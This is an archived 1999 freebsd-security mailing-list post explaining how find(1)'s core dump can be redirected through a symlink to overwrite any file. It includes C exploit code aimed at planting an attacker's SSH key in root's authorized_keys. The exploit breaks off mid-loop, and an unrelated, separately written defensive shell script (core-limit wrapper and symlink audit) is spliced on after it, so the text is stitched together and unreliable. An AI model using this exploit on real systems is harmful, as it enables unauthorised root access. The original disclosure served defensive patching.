From owner-freebsd-security Wed Aug 25 0:16:45 1999
Delivered-To: freebsd-security@freebsd.org
Received: from mx1.lublin.pl (mx1.lublin.pl [212.182.63.76]) by hub.freebsd.org (Postfix) with ESMTP id 4B89716D03 for ; Wed, 25 Aug 1999 00:14:25 -0700 (PDT) (envelope-from venglin@FreeBSD.lublin.pl)
Received: from lagoon.freebsd.lublin.pl ([212.182.117.180]:33547 "HELO lagoon.FreeBSD.lublin.pl") by krupik.man.lublin.pl with SMTP id ; Wed, 25 Aug 1999 09:13:54 +0200
Received: (qmail 91010 invoked by uid 66); 25 Aug 1999 07:16:24 -0000
Received: (qmail 18360 invoked from network); 25 Aug 1999 07:13:28 -0000
Received: from lagoon.gadaczka.org (HELO lagoon.gadaczka.FreeBSD.lublin.pl) (venglin@192.168.0.2) by mailhost.gadaczka.org with SMTP; 25 Aug 1999 07:13:28 -0000
Message-ID:
X-Mailer: XFMail 1.3 [p0] on Linux
X-Priority: 3 (Normal)
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7BIT
MIME-Version: 1.0
In-Reply-To:
X-SMS: +48601383657@text.plusgsm.pl
X-PGP: PGP key on WWW or finger
X-Operating-System: FreeBSD 3.2-STABLE (i386)
Date: Wed, 25 Aug 1999 09:13:18 +0200 (CEST)
Organization: Lubelska Grupa Uzytkownikow BSD
From: Przemyslaw Frasunek
To: Rafal Banaszkiewicz
Subject: RE: fts_print() , find and other stuff ?
Cc: freebsd-security@freebsd.org
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

On 24-Aug-99 Rafal Banaszkiewicz wrote:
> One of my friends has written sploit code for this bug? It's an old
> bug ... and it's still not fixed.

Yes, this bug is quite easy to exploit. find(1) is run every day from the
/etc/security script. It segfaults when the directory tree is _very_ long,
because of a junk pointer to the directory name. A core file is created in one
of the directories of our tree. But if find.core already exists, it is
overwritten. It's possible to create a symlink from e.g. master.passwd or
something else to find.core, and this file will be overwritten. Sample code
below. BTW, sorry for my poor English.

/*
 * (c) 1999 babcia padlina ltd.
 *
 * A bug in the fts libc functions allows overwriting any file in the system
 * when the /etc/security script is run (executed from the 'daily' scripts).
 *
 * affected systems:
 * - freebsd (all versions)
 * - probably openbsd/netbsd
 *
 * fix:
 * - limit root's coredump size
 * - patch libc
 */

#include
#include
#include
#include
#include

#define STRING "\nYOUR PUBLIC SSH1 KEY (-b 512) GOES HERE!\n"
#define FILE "/root/.ssh/authorized_keys"
#define CORE "find.core"
#define DEPTH 300
#define BUFSIZE 250

int makedir(dir, linkfrom, linkto)
char *dir, *linkfrom, *linkto;
{
	if (mkdir(dir, (S_IRWXU | S_IRWXG | S_IRWXO)))
		return -1;
	if (chdir(dir))
		return -1;
	if (symlink(linkfrom, linkto) < 0)
		return -1;
	return 0;
}

int main(void)
{
	int i = 0;
	char pid[10], buf[BUFSIZE];

	sprintf(pid, "%d", getpid());
	if (mkdir(pid, (S_IRWXU | S_IRWXG | S_IRWXO))) {
		perror("mkdir()");
		return -1;
	}
	if (chdir(pid)) {
		perror("chdir()");
		return -1;
	}
	bzero(buf, BUFSIZE);
	memset(buf, 0x41, BUFSIZE-1);
	for(i=0;i
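The post's own fix list names "limit root's coredump size" first, and the overwrite it describes depends on a symlink named find.core sitting somewhere in the tree that find(1) walks. The following shell script is an added example (not part of the original post or of the exploit above) that shows both defender-side pieces: a wrapper that runs any command with the core-dump limit forced to 0, and an audit that lists symlinks named find.core under a directory together with what they point to. The directory tree it scans is constructed inside the script; the function names, the temporary paths and the planted victim.txt are assumptions of the example, and no system path from the post is touched.

```shell
#!/bin/sh
# Added example, not code from the original post. Two defender-side checks for
# the core-file overwrite the post describes:
#   run_without_core     - the "limit root's coredump size" mitigation: run a
#                          command with the core-dump limit (RLIMIT_CORE) at 0.
#   list_core_symlinks   - audit a tree for symlinks named find.core (the file
#                          the post says find(1) dumps into its current dir).
# The demo tree below is constructed here; nothing touches /etc/security.

CORE_NAME="find.core"   # name taken from the post (#define CORE "find.core")

# Run "$@" in a subshell whose core-dump limit is 0, so a crash leaves no core
# file behind. Returns the command's own exit status.
run_without_core() {
    ( ulimit -c 0 && exec "$@" )
}

# Print "link -> target" for every symlink named $CORE_NAME under $1.
list_core_symlinks() {
    find "$1" -type l -name "$CORE_NAME" 2>/dev/null | while IFS= read -r link; do
        printf '%s -> %s\n' "$link" "$(readlink "$link")"
    done
}

# Number of such symlinks under $1 (0 means the tree is clean).
count_core_symlinks() {
    find "$1" -type l -name "$CORE_NAME" 2>/dev/null | wc -l | tr -d ' '
}

# Demo on a constructed tree: one planted symlink, then a deliberate SIGSEGV
# under the 0 core limit to show that no core file is written.
demo() {
    tmp=$(mktemp -d)
    mkdir -p "$tmp/deep/deeper"
    : > "$tmp/victim.txt"                          # constructed stand-in file
    ln -s "$tmp/victim.txt" "$tmp/deep/deeper/$CORE_NAME"
    echo "suspicious symlinks: $(count_core_symlinks "$tmp")"
    list_core_symlinks "$tmp"
    ( cd "$tmp" && run_without_core sh -c 'kill -SEGV $$' ) 2>/dev/null
    if [ -e "$tmp/core" ]; then echo "core written"; else echo "no core file written"; fi
    rm -rf "$tmp"
}
demo
```

On the FreeBSD of the post the equivalent permanent setting is the coredumpsize limit for root's login class rather than a per-invocation ulimit; the wrapper here only shows the effect for one command, and the audit is a read-only check an operator can run over any tree before a periodic job walks it.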